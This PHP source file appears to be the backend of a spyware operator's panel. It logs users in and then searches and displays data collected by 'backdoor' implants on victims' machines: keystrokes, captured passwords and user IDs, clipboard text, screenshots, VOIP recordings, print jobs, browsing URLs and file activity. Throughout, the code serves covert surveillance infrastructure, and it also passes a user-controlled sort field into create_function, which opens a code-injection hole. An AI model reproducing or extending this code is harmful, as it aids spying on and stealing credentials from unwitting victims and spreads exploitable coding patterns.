<?php

require_once('db.inc.php');

function login($user, $pass)
{
   $ret = db_escape(array(&$user,
                          &$pass));

   if(is_string($ret)) {
      return;
   }

   $sql  = "SELECT `user`, ";
   $sql .=        "`level` ";
   $sql .= "FROM `user` ";
   $sql .= "WHERE (`user` = '$user') AND ";
   $sql .=       "(`pass` = SHA1('$pass'))";

   $ret = db_query($sql);

   if(!isset($ret[0]->user)) {
      return;
   }

   $_SESSION['authuser'] = $ret[0]->user;
   $_SESSION['authlevel'] = $ret[0]->level;

   return;
}

function logout()
{
   unset($_SESSION['authlevel']);

   return session_destroy();
}

function checklevel($level)
{
   if(isset($_SESSION['authlevel']) && (($_SESSION['authlevel'] & $level) == $level)) {
      return true;
   }

   return false;
}

function search($type, $backdoor, $remotehost, $remoteuser, $begin, $end, $order)
{
   $ret = db_escape(array(&$type,
                          &$backdoor,
                          &$remotehost,
                          &$remoteuser,
                          &$begin,
                          &$end,
                          &$order));

   if(is_string($ret)) {
      return;
   }

   $ret = array();

   if(($type == 'CONFIG') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "`acquired`, ";
      $sql .=        "'Config Change' AS `desc` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE `type` = 'CONFIG'";
      $sql .= ($backdoor ? " AND `backdoor` = '$backdoor'" : '');
      $sql .= ($remotehost ? " AND `remotehost` = '$remotehost'" : '');
      $sql .= ($remoteuser ? " AND `remoteuser` = '$remoteuser'" : '');
      $sql .= ($begin ? " AND `acquired` >= '$begin'" : '');
      $sql .= ($end ? " AND `acquired` <= '$end'" : '');

      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }

   if(($type == 'DOWNLOAD') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "`acquired`, ";
      $sql .=        "CONCAT(`varchar1`, ' (', LENGTH(`longblob1`), ' bytes)') AS `desc`, ";
      $sql .=        "`log_id` AS `log` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE `type` = 'DOWNLOAD'";
      $sql .= ($backdoor ? " AND `backdoor` = '$backdoor'" : '');
      $sql .= ($remotehost ? " AND `remotehost` = '$remotehost'" : '');
      $sql .= ($remoteuser ? " AND `remoteuser` = '$remoteuser'" : '');
      $sql .= ($begin ? " AND `acquired` >= '$begin'" : '');
      $sql .= ($end ? " AND `acquired` <= '$end'" : '');
   
      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }

   if(($type == 'UPLOAD') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "`acquired`, ";
      $sql .=        "CONCAT(`varchar1`, ' (', LENGTH(`longblob1`), ' bytes)') AS `desc`, ";
      $sql .=        "`log_id` AS `log` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE `type` = 'UPLOAD'";
      $sql .= ($backdoor ? " AND `backdoor` = '$backdoor'" : '');
      $sql .= ($remotehost ? " AND `remotehost` = '$remotehost'" : '');
      $sql .= ($remoteuser ? " AND `remoteuser` = '$remoteuser'" : '');
      $sql .= ($begin ? " AND `acquired` >= '$begin'" : '');
      $sql .= ($end ? " AND `acquired` <= '$end'" : '');
   
      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }
 
   if(($type == 'SNAPSHOT') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "`acquired`, ";
      $sql .=        "'Snapshot' AS `desc`, ";
      $sql .=        "`log_id` AS `log` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE `type` = 'SNAPSHOT'";
      $sql .= ($backdoor ? " AND `backdoor` = '$backdoor'" : '');
      $sql .= ($remotehost ? " AND `remotehost` = '$remotehost'" : '');
      $sql .= ($remoteuser ? " AND `remoteuser` = '$remoteuser'" : '');
      $sql .= ($begin ? " AND `acquired` >= '$begin'" : '');
      $sql .= ($end ? " AND `acquired` <= '$end'" : '');
   
      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }
 
   if(($type == 'FILECAP') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "`acquired`, ";
      $sql .=        "CONCAT(`varchar1`, ' (', LENGTH(`longblob1`), ' bytes)') AS `desc`, ";
      $sql .=        "`log_id` AS `log` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE `type` = 'FILECAP'";
      $sql .= ($backdoor ? " AND `backdoor` = '$backdoor'" : '');
      $sql .= ($remotehost ? " AND `remotehost` = '$remotehost'" : '');
      $sql .= ($remoteuser ? " AND `remoteuser` = '$remoteuser'" : '');
      $sql .= ($begin ? " AND `acquired` >= '$begin'" : '');
      $sql .= ($end ? " AND `acquired` <= '$end'" : '');
   
      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }

   if(($type == 'CLIPBOARD') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "`acquired`, ";
      $sql .=        "`varchar1` AS `desc`, ";
      $sql .=        "`log_id` AS `log` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE `type` = 'CLIPBOARD'";
      $sql .= ($backdoor ? " AND `backdoor` = '$backdoor'" : '');
      $sql .= ($remotehost ? " AND `remotehost` = '$remotehost'" : '');
      $sql .= ($remoteuser ? " AND `remoteuser` = '$remoteuser'" : '');
      $sql .= ($begin ? " AND `acquired` >= '$begin'" : '');
      $sql .= ($end ? " AND `acquired` <= '$end'" : '');
   
      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }
 
   if(($type == 'PRINT') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "`acquired`, ";
      $sql .=        "`varchar1` AS `desc`, ";
      $sql .=        "`log_id` AS `log` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE `type` = 'PRINT'";
      $sql .= ($backdoor ? " AND `backdoor` = '$backdoor'" : '');
      $sql .= ($remotehost ? " AND `remotehost` = '$remotehost'" : '');
      $sql .= ($remoteuser ? " AND `remoteuser` = '$remoteuser'" : '');
      $sql .= ($begin ? " AND `acquired` >= '$begin'" : '');
      $sql .= ($end ? " AND `acquired` <= '$end'" : '');
   
      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }
 
   if(($type == 'VOIP') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "`acquired`, ";
      $sql .=        "`varchar1` AS `desc`, ";
      $sql .=        "`int1` AS `duration`, ";
      $sql .=        "`log_id` AS `log` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE `type` = 'VOIP'";
      $sql .= ($backdoor ? " AND `backdoor` = '$backdoor'" : '');
      $sql .= ($remotehost ? " AND `remotehost` = '$remotehost'" : '');
      $sql .= ($remoteuser ? " AND `remoteuser` = '$remoteuser'" : '');
      $sql .= ($begin ? " AND `acquired` >= '$begin'" : '');
      $sql .= ($end ? " AND `acquired` <= '$end'" : '');
   
      $tmp = db_query($sql);

      if($tmp) {
         foreach($tmp as &$t) {
            $t->desc .= ' ('.(integer)($t->duration / 60).':'.sprintf('%02d', $t->duration % 60).')';
         }

         $ret = array_merge($ret, $tmp);
      }
   }

   if(($type == 'KEYLOG') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "MAX(`acquired`) AS `acquired`, ";
      $sql .=        "CONCAT('Keylog (', COUNT(`log_id`), ')') AS `desc` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE (`type` = 'KEYLOG') ";
      $sql .= ($backdoor ? "AND (`backdoor` = '$backdoor') " : '');
      $sql .= ($remotehost ? "AND (`remotehost` = '$remotehost') " : '');
      $sql .= ($remoteuser ? "AND (`remoteuser` = '$remoteuser') " : '');
      $sql .= ($begin ? "AND (`acquired` >= '$begin') " : '');
      $sql .= ($end ? "AND (`acquired` <= '$end') " : '');
      $sql .= "GROUP BY `backdoor`, ";
      $sql .=          "`remotehost`, ";
      $sql .=          "`remoteuser`";

      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }

   if(($type == 'URL') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "MAX(`acquired`) AS `acquired`, ";
      $sql .=        "CONCAT('Url (', COUNT(`log_id`), ')') AS `desc` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE (`type` = 'URL') ";
      $sql .= ($backdoor ? "AND (`backdoor` = '$backdoor') " : '');
      $sql .= ($remotehost ? "AND (`remotehost` = '$remotehost') " : '');
      $sql .= ($remoteuser ? "AND (`remoteuser` = '$remoteuser') " : '');
      $sql .= ($begin ? "AND (`acquired` >= '$begin') " : '');
      $sql .= ($end ? "AND (`acquired` <= '$end') " : '');
      $sql .= "GROUP BY `backdoor`, ";
      $sql .=          "`remotehost`, ";
      $sql .=          "`remoteuser`";

      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }

   if(($type == 'FILEOPEN') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "MAX(`acquired`) AS `acquired`, ";
      $sql .=        "CONCAT('File (', COUNT(`log_id`), ')') AS `desc` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE (`type` = 'FILEOPEN') ";
      $sql .= ($backdoor ? "AND (`backdoor` = '$backdoor') " : '');
      $sql .= ($remotehost ? "AND (`remotehost` = '$remotehost') " : '');
      $sql .= ($remoteuser ? "AND (`remoteuser` = '$remoteuser') " : '');
      $sql .= ($begin ? "AND (`acquired` >= '$begin') " : '');
      $sql .= ($end ? "AND (`acquired` <= '$end') " : '');
      $sql .= "GROUP BY `backdoor`, ";
      $sql .=          "`remotehost`, ";
      $sql .=          "`remoteuser`";

      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   } 

   if(($type == 'PASSWORD') || !$type) {
      $sql  = "SELECT `type`, ";
      $sql .=        "`backdoor`, ";
      $sql .=        "`remotehost`, ";
      $sql .=        "`remoteuser`, ";
      $sql .=        "MAX(`acquired`) AS `acquired`, ";
      $sql .=        "CONCAT('Password (', COUNT(`log_id`), ')') AS `desc` ";
      $sql .= "FROM `log` ";
      $sql .= "JOIN `backdoor` ";
      $sql .= "USING (`backdoor_id`) ";
      $sql .= "WHERE (`type` = 'PASSWORD') ";
      $sql .= ($backdoor ? "AND (`backdoor` = '$backdoor') " : '');
      $sql .= ($remotehost ? "AND (`remotehost` = '$remotehost') " : '');
      $sql .= ($remoteuser ? "AND (`remoteuser` = '$remoteuser') " : '');
      $sql .= ($begin ? "AND (`acquired` >= '$begin') " : '');
      $sql .= ($end ? "AND (`acquired` <= '$end') " : '');
      $sql .= "GROUP BY `backdoor`, ";
      $sql .=          "`remotehost`, ";
      $sql .=          "`remoteuser`";

      $tmp = db_query($sql);

      if($tmp) {
         $ret = array_merge($ret, $tmp);
      }
   }

   $order = ($order ? $order : 'acquired');

   $lambda = create_function('$a, $b',
                             'return strcasecmp($a->'.$order.', $b->'.$order.');');

   $rlambda = create_function('$a, $b',
                              'return (-1 * strcasecmp($a->'.$order.', $b->'.$order.'));');

   if($order == 'acquired') {
      usort($ret, $rlambda);
   } else {
      usort($ret, $lambda);
   }

   return $ret;
}

function view($log, $type, $backdoor, $remotehost, $remoteuser, $begin, $end)
{
   $ret = db_escape(array(&$log,
                          &$type,
                          &$backdoor,
                          &$remotehost,
                          &$remoteuser,
                          &$begin,
                          &$end));

   if(is_string($ret)) {
      return;
   }

   switch($type) {
      case 'CONFIG':
         $ret = false;

         break;
      case 'DOWNLOAD':
      case 'UPLOAD':
      case 'SNAPSHOT':
      case 'FILECAP':
      case 'PRINT':
      case 'VOIP':
         $sql  = "SELECT `varchar1` AS `desc`, ";
         $sql .=        "`longblob1` AS `content` ";
         $sql .= "FROM `log` ";
         $sql .= "JOIN `backdoor` ";
         $sql .= "USING (`backdoor_id`) ";
         $sql .= "WHERE `log_id` = '$log'";

         $ret = db_query($sql);

         break;
      case 'CLIPBOARD':
         $sql  = "SELECT `varchar1` AS `process`, ";
         $sql .=        "`varchar2` AS `window`, ";
         $sql .=        "`acquired`, ";
         $sql .=        "`longtext1` AS `content` ";
         $sql .= "FROM `log` ";
         $sql .= "JOIN `backdoor` ";
         $sql .= "USING (`backdoor_id`) ";
         $sql .= "WHERE `log_id` = '$log'";

         $ret = db_query($sql);

         break;
      case 'KEYLOG':
         $sql  = "SELECT `varchar1` AS `process`, ";
         $sql .=        "`varchar2` AS `window`, ";
         $sql .=        "`acquired`, ";
         $sql .=        "`longtext1` AS `content` ";
         $sql .= "FROM `log` ";
         $sql .= "JOIN `backdoor` ";
         $sql .= "USING (`backdoor_id`) ";
         $sql .= "WHERE (`type` = 'KEYLOG') ";
         $sql .= ($backdoor ? "AND (`backdoor` = '$backdoor') " : '');
         $sql .= ($remotehost ? "AND (`remotehost` = '$remotehost') " : '');
         $sql .= ($remoteuser ? "AND (`remoteuser` = '$remoteuser') " : '');
         $sql .= ($begin ? "AND (`acquired` >= '$begin') " : '');
         $sql .= ($end ? "AND (`acquired` <= '$end') " : '');
         $sql .= "ORDER BY `acquired`";

         $ret = db_query($sql);

         break;
      case 'URL':
         $sql  = "SELECT `longtext1` AS `url`, ";
         $sql .=        "`acquired` ";
         $sql .= "FROM `log` ";
         $sql .= "JOIN `backdoor` ";
         $sql .= "USING (`backdoor_id`) ";
         $sql .= "WHERE (`type` = 'URL') ";
         $sql .= ($backdoor ? "AND (`backdoor` = '$backdoor') " : '');
         $sql .= ($remotehost ? "AND (`remotehost` = '$remotehost') " : '');
         $sql .= ($remoteuser ? "AND (`remoteuser` = '$remoteuser') " : '');
         $sql .= ($begin ? "AND (`acquired` >= '$begin') " : '');
         $sql .= ($end ? "AND (`acquired` <= '$end') " : '');
         $sql .= "ORDER BY `acquired`";

         $ret = db_query($sql);

         break;
      case 'FILEOPEN':
         $sql  = "SELECT `varchar1` AS `process`, ";
         $sql .=        "`varchar2` AS `filename`, ";
         $sql .=        "((`int1` * 4 * 1024 * 1024 * 1024) + `int2`) AS `size`, ";
         $sql .=        "`int3` AS `flags`, ";
         $sql .=        "`acquired` ";
         $sql .= "FROM `log` ";
         $sql .= "JOIN `backdoor` ";
         $sql .= "USING (`backdoor_id`) ";
         $sql .= "WHERE (`type` = 'FILEOPEN') ";
         $sql .= ($backdoor ? "AND (`backdoor` = '$backdoor') " : '');
         $sql .= ($remotehost ? "AND (`remotehost` = '$remotehost') " : '');
         $sql .= ($remoteuser ? "AND (`remoteuser` = '$remoteuser') " : '');
         $sql .= ($begin ? "AND (`acquired` >= '$begin') " : '');
         $sql .= ($end ? "AND (`acquired` <= '$end') " : '');
         $sql .= "ORDER BY `acquired`";
 
         $ret = db_query($sql);
  
         break;
      case 'PASSWORD':
         $sql  = "SELECT `varchar1` AS `resource`, ";
         $sql .=        "`varchar2` AS `service`, ";
         $sql .=        "`varchar3` AS `password`, ";
         $sql .=        "`varchar4` AS `userid`, ";
         $sql .=        "`acquired` ";
         $sql .= "FROM `log` ";
         $sql .= "JOIN `backdoor` ";
         $sql .= "USING (`backdoor_id`) ";
         $sql .= "WHERE (`type` = 'PASSWORD') ";
         $sql .= ($backdoor ? "AND (`backdoor` = '$backdoor') " : '');
         $sql .= ($remotehost ? "AND (`remotehost` = '$remotehost') " : '');
         $sql .= ($remoteuser ? "AND (`remoteuser` = '$remoteuser') " : '');
         $sql .= ($begin ? "AND (`acquired` >= '$begin') " : '');
         $sql .= ($end ? "AND (`acquired` <= '$end') " : '');
         $sql .= "ORDER BY `varchar1`";

         $ret = db_query($sql);

         break;
   }

   return $ret;
}

function getparam()
{
   $sql  = "SELECT DISTINCT `type`, ";
   $sql .=                 "`backdoor`, ";
   $sql .=                 "`remotehost`, ";
   $sql .=                 "`remoteuser` ";
   $sql .= "FROM `log` ";
   $sql .= "JOIN `backdoor` ";
   $sql .= "USING (`backdoor_id`)";

   $ret = db_query($sql);

   if(is_string($ret)) {
      return $ret;
   } else if($ret === false) {
      return false;
   }

   foreach(array('type', 'backdoor', 'remotehost', 'remoteuser') as $field) {
      $tmp->$field = array();
      foreach($ret as $r) {
         array_push($tmp->$field, $r->$field);
      }
      $tmp->$field = array_unique($tmp->$field);
      sort($tmp->$field);
   }

   $ret = $tmp;

   return $ret;
}

define('AL_VIEW', 0x01);   // viewer access
define('AL_TECH', 0x02);   // technician access
define('AL_SERV', 0x04);   // server access
define('AL_ADMN', 0x80);   // administrator access

?>
